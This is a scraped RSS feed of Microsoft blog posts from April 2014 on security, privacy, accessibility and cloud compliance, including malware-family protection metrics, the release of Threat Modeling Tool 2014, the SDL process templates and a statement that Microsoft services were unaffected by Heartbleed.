href="http://www.microsoft.com/security/sdl/story/">For more than a decade</a>, we&rsquo;ve made significant investments in securing our devices and services. 
What people may not know is that we&rsquo;ve also been involved in cross-platform activities for some time.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/24/microsoft-s-commitment-to-the-core-infrastructure-initiative.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3628121&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud security10 Year MilestoneCollective DefenseCloud Computingcyber securitycloud servicesTrustworthy ComputingSteve LipnerMicrosoft Cloud Solutionssecurity community Jenny Lay-Flurrie Scaled Plenty of Brick Walls to Become a Leader of Accessibility at Microsofthttp://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspxThu, 24 Apr 2014 13:18:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10519978Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10519978http://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspx#commentsJenny Lay-Flurrie has enjoyed an impressive career so far, one that has taken her from Birmingham, England, to the Microsoft campus in Redmond, Wa. 
Deaf most of her life, Lay-Flurrie has faced a series of what she calls brick walls, moments when the...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/24/jenny-lay-flurrie-scaled-plenty-of-brick-walls-to-become-a-leader-of-accessibility-at-microsoft.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10519978" width="1" height="1"> The Microsoft Approach to Compliance in the Cloudhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspxWed, 23 Apr 2014 02:45:27 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:90caf887-b4a5-4578-b027-017afb0a860aTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Our customers do business in almost every industry and country around the world. Many of them need to meet regulatory compliance and certification requirements.&nbsp; When they trust a cloud service provider to manage infrastructure, applications, or data for them, that service provider becomes a partner that they trust to help meet and maintain their compliance and certification requirements.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspx">Read more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/22/the-microsoft-approach-to-compliance-in-the-cloud.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627951&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesAdrienne Hallcustomer perspectiveCloud Computingcloud servicesMicrosoftMicrosoft Cloud Solutions Closed Captioned-Videos Could Help All Students, Study Suggestshttp://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspxTue, 22 Apr 2014 14:14:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10519976Daniel Hubbell - 
MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10519976http://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspx#commentsA new study found that a wide range of university students, not just those who are deaf or have limited hearing, could benefit from using closed-captioned videos in classrooms, Media Access Australia reported. When a professor used videos with closed...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/22/closed-captioned-videos-could-help-all-students-study-suggests.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10519976" width="1" height="1"> Panel: “Protecting Privacy & National Security in the Digital Age”http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspxMon, 21 Apr 2014 22:03:55 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:bb4a3819-3bc7-416a-95d8-83ac52d73a79Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>As technology continues to connect us in seemingly infinite ways, people are increasingly discussing appropriate levels of trade-offs that come with modern day conveniences. 
In line with the company&rsquo;s role over the past decades, Microsoft continues to be a key participant and driver of these conversations.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspx">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/21/panel-protecting-privacy-amp-national-security-in-the-digital-age.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627860&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesBrendon Lynchscott charneyTrustTrustworthy ComputingMicrosoftpersonal dataDataPrivacy Protection metrics trends – First quarter 2014 resultshttp://blogs.technet.com/b/mmpc/archive/2014/04/17/protection-metrics-trends-first-quarter-2014-results.aspxThu, 17 Apr 2014 22:14:25 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:9f0c7fd0-13b1-48db-9eba-f4bada8c0db5msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/17/protection-metrics-trends-first-quarter-2014-results.aspx#comments<p>​It&#39;s been a few months since our last post on our metrics. I wanted to give you an update on families that are declining, new ones that are moving in, and on the way we&#39;re calculating our protection metrics to make them more accurate.</p> <p>Overall, our infection impact (0.29% for January to March) has remained consistently low since December. A few families have declined, but others have moved into their place. Our incorrect detections have stayed under 0.001% and our performance metrics remain fairly consistent.</p> <p><strong>Declining families</strong></p> <p>The &quot;Sefnit trio&quot;, mentioned in several of our <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspx"> prior blog posts</a>, have declined significantly (although Sefnit itself has picked up in March through exploring new distribution methods). 
At the peak in October 2013, these families were contributing to nearly one-fifth of the customer infections we saw that month. Now they are down to 7%.</p> <p><strong>New families</strong></p> <p>Spacekito and Clikug are recent additions. <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=MSIL/Spacekito#tab=2"> Spacekito</a> is distributed through a software bundler and claims to be a &quot;browser protector.&quot; It exfiltrates data about the system upon which it&#39;s installed, serves ads, and aggressively reinstalls itself, so it&#39;s difficult for our customers to remove if they don&#39;t want it anymore.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Clikug.A"> Clikug</a> uses your computer for click-fraud, which happens in the background. You may simply notice that your computer is sluggish.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Zbot"> Zbot</a> isn&#39;t new, but since late last year it has been aggressively distributed by <a href="http://www.microsoft.com/en-us/search/results.aspx?q=Upatre+site:http://www.microsoft.com/security/portal"> Upatre</a> (through spam), which is another family that is edging up the ranks in our top 20 list impacting our customers.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Wysotot"> Wysotot</a>, which we first mentioned in our <a href="http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-november-results.aspx"> Nov results</a>, is also still a top player in terms of customer impact. 
Wysotot is typically installed on your computer through software bundlers that advertise free software or games.</p> <p><strong>Protection metrics update</strong></p> <p>You may notice a few changes on the <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx"> Evaluating our protection performance and capabilities page</a>: we&#39;ve updated the way we calculate our infection and incorrect detection impact. In the past, we counted the number of computers that downloaded an update for one of our real-time protection products. Although most of our customers opt in to report threat telemetry to us, some don&#39;t.</p> <p>In the past, our products weren&#39;t instrumented to give us accurate counts of people that opted to share their&nbsp;telemetry, and thus the potential population that could report a threat wasn&#39;t easy to discern &ndash; we had to rely on our update numbers.</p> <p>In 2013, we shipped a new feature to alleviate this. Essentially, on regular intervals, computers running Microsoft antimalware that have opted to provide this information&nbsp;will send a signal that lets us know they&#39;re still protected and helps us count the true number of computers that could report a threat to us.</p> <p>The feature was deployed to all of our customers starting in July, so our new trends on the <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx"> Evaluating our protection performance and capabilities page</a> start in Aug 2013. This new denominator provides a much more accurate figure for our infection and incorrect detection impact.</p> <p>In our upcoming <a href="http://www.microsoft.com/security/sir/"> Security Intelligence Report</a> (SIRv16), we&#39;ll also be using this same denominator to report the malware encounter rate.</p> <p>I hope this post provides you with insight into how we&#39;re measuring our protection and performance for our customers that choose us for protection. 
We truly strive to be transparent in how we measure ourselves, and also to&nbsp;provide our customers with an optimal balance of protection and performance.</p> <p>&nbsp;</p> <p>-Holly Stewart<br />MMPC</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3627566&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> New Association of Accessibility Professionals Kicks Off Work with New Members and Great Supporthttp://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspxThu, 17 Apr 2014 14:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10518126Daniel Hubbell - MSFT1http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10518126http://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspx#commentsThis blog post was written by Rob Sinclair, Microsoft&rsquo;s Chief Accessibility Officer. Rob is responsible for the company's worldwide strategy to develop software and services that make it easier for people of all ages and abilities to see, hear,...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10518126" width="1" height="1"> The Evolving Pursuit of Privacyhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/15/the-evolving-pursuit-of-privacy.aspxTue, 15 Apr 2014 18:07:50 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3f8f9512-8186-45f6-832b-dcc0ffc046cfTrusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>In my role, I have the opportunity to discuss privacy with a wide variety of people &ndash; Microsoft&rsquo;s customers and partners, policymakers, advocates and industry colleagues. 
In recent weeks, I participated in many such conversations at the RSA Conference and the International Association of Privacy Professionals (IAPP) Global Privacy Summit.&nbsp; <a href="/b/trustworthycomputing/archive/2014/04/14/the-evolving-pursuit-of-privacy.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/15/the-evolving-pursuit-of-privacy.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627406&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesBrendon Lynchscott charneyprivacy and reliabilityStandardsTrustworthy Computingpersonal dataDataPrivacy New Microsoft Threat Modeling Tool 2014 Now Availablehttp://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspxTue, 15 Apr 2014 17:09:58 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:80c56b15-b720-4dfe-a3b3-d4e8a81c59feTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627470http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627470http://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx#comments<p>Today we&rsquo;re announcing the release of the&nbsp;<strong><a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a></strong>. This is the latest version of the free&nbsp;<a href="/b/security/archive/2012/08/23/microsoft-s-free-security-tools-threat-modeling.aspx">Security Development Lifecycle Threat Modeling Tool&nbsp;</a>that was previously released back in 2011.</p> <p>More and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating. 
Threat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.&nbsp;&nbsp;</p> <p>We have been threat modeling at Microsoft for more than 10 years. It is a key piece of the design phase of the&nbsp;<a href="http://www.microsoft.com/security/sdl/default.aspx">Microsoft Security Development Lifecycle&nbsp;</a>(SDL).&nbsp; In 2011 we released the SDL Threat Modeling Tool, free of charge, to make it easier for customers and partners to threat model as part of their software development processes. The tool has been very popular and we have received a lot of positive customer feedback in addition to suggestions for improvement.&nbsp;<a href="/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627470&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">threat modeling toolTMTSDLSecurity Development Lifecycle Introducing Microsoft Threat Modeling Tool 2014http://blogs.msdn.com/b/sdl/archive/2014/04/15/introducing-microsoft-threat-modeling-tool-2014.aspxTue, 15 Apr 2014 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10517297SDL Team10http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10517297http://blogs.msdn.com/b/sdl/archive/2014/04/15/introducing-microsoft-threat-modeling-tool-2014.aspx#comments<p>Today, we are excited to announce the general availability of a new version of a very popular Security Development Lifecycle tool &ndash;<a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi"> Microsoft Threat Modeling Tool 2014</a>. 
It&rsquo;s available as a free download from Microsoft Download Center <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">here</a>.</p> <p>Threat modeling is an invaluable part of the <a href="http://www.microsoft.com/security/sdl">Security Development Lifecycle</a> (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations.</p> <p>For those who would like more of an introduction to threat modeling, please visit <a href="http://msdn.microsoft.com/en-us/magazine/cc163519.aspx">Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach</a>. But, without further ado, let&rsquo;s dig into the fun stuff &ndash; the new features of Threat Modeling Tool 2014.</p> <p><span style="font-size: medium;"><strong>Microsoft Threat Modeling Tool 2014 - Changes and New Features</strong></span></p> <p>Microsoft announced the general availability of the SDL Threat Modeling Tool v3.1.8 in 2011, which gave software development teams an approach to design their security systems following the threat modeling process. <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a> introduces many improvements and new features, see the highlights below.</p> <p><span style="font-size: x-small;"><strong>&nbsp;Figure 1. 
Microsoft Threat Modeling Tool 2014 Home Screen</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/2626.1.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/2626.1.png" alt="" border="0" /></a></p> <p><span style="font-size: x-small;"><strong><br /></strong></span></p> <p><span style="text-decoration: underline;"><span style="font-size: small;"><strong>NEW DRAWING SURFACE</strong></span></span><br />One of our goals with this release is to provide a simplified workflow for building a threat model and to remove existing dependencies. You&rsquo;ll find an intuitive user interface with easy navigation between the different modes. The new version of the tool has a new drawing surface, and <strong>Microsoft Visio is no longer required</strong> to create new threat models. Using the Design View of the tool, you can create your data flow diagram with the included stencil set (see&nbsp;<strong>Figure 2</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 2. Microsoft Threat Modeling Tool 2014 - Design View</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0268.2.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0268.2.png" alt="" border="0" /></a></p> <p><span style="font-size: x-small;"><strong><br /></strong></span></p> <p><strong><span style="text-decoration: underline;">MIGRATION FOR V3 THREAT MODELS</span></strong><br />Threat modeling is an iterative process. Development teams create threat models that evolve over time as systems and threats change. We wanted to make sure the new tool supports this flow. 
Microsoft Threat Modeling Tool 2014 offers migration of threat models created with version 3.1.8, which allows existing threat models of security system designs to be updated easily. (NOTE: Microsoft Visio 2007 or later is required only for migrating threat models from v3.1.8.) Threat models created with the v3 version of the tool (.tms format) can be migrated to the new format (.tm4) (see&nbsp;<strong>Figure 3</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 3. Migrating v3 Threat Models</strong></span></p> <p><span style="font-size: x-small;"><strong><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3426.3.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3426.3.png" alt="" border="0" /></a><br /></strong></span></p> <p>&nbsp;</p> <p><strong><span style="text-decoration: underline;">STRIDE PER INTERACTION</span></strong><br />One of the key changes we are introducing is an update to the threat generation logic. Previous versions of the tool took the approach of applying STRIDE per element. Microsoft Threat Modeling Tool 2014 uses the STRIDE categories but generates threats based on the interaction between elements.&nbsp; We take into consideration the type of elements used on the diagram (e.g., processes, data stores, etc.) and what type of data flows connect these elements. When in Analysis View, the tool shows the suggested threats for your data flow diagram in a simple grid (see&nbsp;<strong>Figure 4</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 4. 
Microsoft Threat Modeling Tool 2014 &ndash; Analysis View</strong></span></p> <p><span style="font-size: x-small;"><strong><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/6557.4.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/6557.4.png" alt="" border="0" /></a></strong></span></p> <p><span style="text-decoration: underline;"><strong><br />DEFINE YOUR OWN THREATS</strong></span><br />Microsoft Threat Modeling Tool 2014 comes with a base set of threat definitions using STRIDE categories. This set includes only suggested threat definitions and mitigations which are automatically generated to show potential security vulnerabilities for your data flow diagram. You should analyze your threat model with your team to ensure you have addressed all potential security pitfalls. To offer more flexibility, Microsoft Threat Modeling Tool 2014 gives users the option to add their own threats related to their specific domain. This means users can extend the base set of threat definitions by authoring the provided XML format. For details on adding your own threats, see the Threat Modeling tool SDK. With this feature, we have higher confidence that our users can get the best possible picture of their threat landscape (see&nbsp;<strong>Figure 5</strong>).&nbsp;</p> <p><span style="font-size: x-small;"><strong>Figure 5. 
Threat Model Definitions Grammar in Backus-Naur Form (BNF)</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0243.5.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0243.5.png" alt="" border="0" /></a></p> <p><br />We hope these new enhancements in <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a> will provide greater flexibility and help you implement the SDL process effectively in your organization.</p> <p>Thank you to all who helped ship this release through internal and external feedback. Your input was critical to improving the tool and the customer experience.</p> <p><strong>For more information and additional resources, visit:</strong></p> <ul> <li><span style="font-size: small;"><a href="http://www.microsoft.com/security/sdl">Microsoft Security Development Lifecycle (SDL)</a></span></li> <li><a href="http://msdn.microsoft.com/en-us/magazine/cc163519.aspx">Uncover Security Design Flaws Using the STRIDE Approach</a></li> <li><span style="font-size: small;"><a href="http://www.microsoft.com/security/sdl/adopt/eop.aspx">Getting Started with Threat Modeling: Elevation of Privilege (EoP) Game</a></span></li> <li><span style="font-size: small;"><a href="http://msdn.microsoft.com/en-us/magazine/cc700352.aspx">Reinvigorate your Threat Modeling Process</a></span></li> <li><span style="font-size: small;"><a href="http://msdn.microsoft.com/en-us/magazine/dd148644.aspx">Threat Models Improve Your Security Process</a></span></li> <li><span style="font-size: small;"><a href="http://threatmodelingbook.com/">Threat Modeling: Designing for Security (BOOK)</a></span></li> </ul> <p>&nbsp;</p> <p><strong>Emil Karafezov</strong> is a Program Manager on the Secure Development Tools and Policies 
team at Microsoft. He&rsquo;s responsible for the Threat Modeling component of the Security Development Lifecycle (SDL).</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10517297" width="1" height="1">Threat Modeling ToolSTRIDETMTThreat Modeling Tool 2014 SDL Process Templates for Visual Studio Team Foundation Server 2013http://blogs.msdn.com/b/sdl/archive/2014/04/15/sdl-process-templates-for-visual-studio-team-foundation-server-2013.aspxTue, 15 Apr 2014 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10517311SDL Team0http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10517311http://blogs.msdn.com/b/sdl/archive/2014/04/15/sdl-process-templates-for-visual-studio-team-foundation-server-2013.aspx#comments<p><span style="font-family: verdana, geneva;">Today, we are excited to announce the general availability of a new version of the SDL process templates:</span></p> <ul> <li><span style="font-family: verdana, geneva; font-size: small;"><a href="http://download.microsoft.com/download/6/B/1/6B17D961-2207-4AA7-B043-019C041E9966/MSF for Agile 2013 plus Security Development Lifecycle.msi">Microsoft Solutions Framework (MSF) for&nbsp;Agile 2013 plus Security Development Lifecycle (SDL)&nbsp;</a></span></li> <li><span style="font-family: verdana, geneva; font-size: small;"><a href="http://download.microsoft.com/download/F/C/C/FCC3BD51-AAB4-4AF2-A628-4197492C67CD/MSF for CMMI 2013 plus Security Development Lifecycle.msi">Microsoft Solutions Framework (MSF) for Capability Maturity Model Integration (CMMI) 2013 plus Security Development Lifecycle (SDL)</a>&nbsp;&nbsp;</span></li> </ul> <p><span style="font-family: verdana, geneva;">This version of the SDL Process Templates is specific to the </span><a style="font-family: verdana, geneva;" href="http://msdn.microsoft.com/en-us/security/cc420639.aspx">Microsoft Security Development Lifecycle version 5.2</a><span style="font-family: verdana, geneva;">.&nbsp;</span></p> <p><span 
style="font-family: verdana, geneva;">The SDL Process Templates automatically integrate the policy, process and tools associated with the Microsoft Security Development Lifecycle (SDL) into <a href="http://www.visualstudio.com/en-us/visual-studio-homepage-vs.aspx">Visual Studio 2013</a> and <a href="http://msdn.microsoft.com/en-us/vstudio/ff637362.aspx">Visual Studio Team Foundation Server</a> (TFS). With the process templates, code checked into the Visual Studio TFS source repository by a developer is analyzed to ensure that it complies with SDL secure development practices. The templates also create security workflow tracking items for manual SDL processes such as threat modeling, to ensure that these important security activities are not accidentally skipped or forgotten.</span></p> <p><span style="font-family: verdana, geneva;">The SDL Process Templates include:&nbsp;</span></p> <ul> <li><span style="font-family: verdana, geneva; font-size: small;">SDL-based customized check-in policies</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Security work items</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Security dashboard</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Integration with SDL process guidance</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Customized security queries</span></li> </ul> <p><span style="font-size: x-small; font-family: verdana, geneva;"><strong>Figure 1 Visual Studio 2013 Team Foundation Server Security Dashboard</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/7522.6.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/7522.6.png" alt="" border="0" /></a></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> 
<p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Eases the adoption of the SDL</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates automate the creation of SDL requirements and enable development teams to begin adopting the SDL process without having to be fully trained on the SDL. They integrate the SDL into everyday tasks by leveraging the existing development environment (Visual Studio) and the project-wide framework (TFS) in a way that is familiar to program managers and testers, as well as developers.</span><br /><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Provides auditable security requirements and status</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates include the Security Dashboard, which provides an up-to-the-minute overview of security issues and status for all security requirements associated with a project. This report allows management to document and verify that SDL requirements were met prior to a product&rsquo;s release.</span><br /><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Demonstrates security return on investment</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates allow for the integration of third-party tools that work with TFS. Through reporting, the template provides data that allows you to assess the effectiveness of your security tools. 
In addition, the template enables you to experience the benefits of the SDL by discovering security issues early in your development lifecycle, reducing the total cost of development.</span><br /><br /><br /></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10517311" width="1" height="1">Process Templates for Visual Studio New Story Explores Braille’s Role and Use in Accessible Technology and the Digital Agehttp://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspxTue, 15 Apr 2014 16:18:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10518129Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10518129http://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspx#commentsIn some ways Braille was one of the original accessible technologies, one that opened up a universe of books and reading material to blind readers. The explosion of modern technology, though, is changing how Braille is used. A new story by NPR explores...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10518129" width="1" height="1"> April 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/04/11/april-2014-security-bulletin-webcast-and-q-amp-a.aspxFri, 11 Apr 2014 20:40:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c5d107dc-d9da-48c6-925c-9706fa86c319Dustin C. Childs0<p>Today we published the <a href="http://blogs.technet.com/b/msrc/p/april-2014-security-bulletin-q-a.aspx">April 2013 Security Bulletin Webcast Questions &amp; Answers page</a>. 
We answered 13 questions in total, with the majority focusing on the update for Internet Explorer (<a href="https://technet.microsoft.com/security/bulletin/ms14-018">MS14-018</a>) and the Windows 8.1 Update (<a href="http://support.microsoft.com/kb/2919355">KB2919355</a>). Two questions that were not answered on air have been included on the Q&amp;A page.</p> <p>Here is the video replay.</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/DpKwsISWMjA?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/DpKwsISWMjA?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></p> <p>For those of you following the ongoing investigation around the industry-wide issue known as &ldquo;Heartbleed,&rdquo; please refer to <a href="http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">this post</a> on the Microsoft Security Blog for the status of our investigation.</p> <p>We invite you to join us for the next scheduled webcast on Wednesday, May 14, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the May bulletin release and answer your bulletin deployment questions live on the air.</p> <p>You can register to attend the webcast at the link below:</p> <p><b>Date: Wednesday, May 14, 2014<br /> Time: 11:00 a.m. 
PDT (UTC -7)<br /> Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572979&amp;Culture=en-US"><b>Attendee Registration</b></a></p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3627283&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastSecurity Bulletin WebcastInternet Explorer (IE)Microsoft Office Microsoft Services unaffected by OpenSSL "Heartbleed" vulnerabilityhttp://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspxThu, 10 Apr 2014 21:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c992c01c-b557-4eab-bcc9-c2ea05234614Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627193http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627193http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx#comments<p>Posted by:&nbsp;<strong>Tracey Pretorius,</strong>&nbsp;Director, Trustworthy Computing</p> <p>On April 8, 2014, security researchers announced a flaw in the OpenSSL encryption software library used by many websites to protect customers&rsquo; data. The vulnerability, known as &ldquo;Heartbleed,&rdquo; could potentially allow a cyberattacker to access a website&rsquo;s customer data along with traffic encryption keys.</p> <p>After a thorough investigation, we determined that Microsoft Services are not impacted by the OpenSSL &ldquo;Heartbleed&rdquo; vulnerability. 
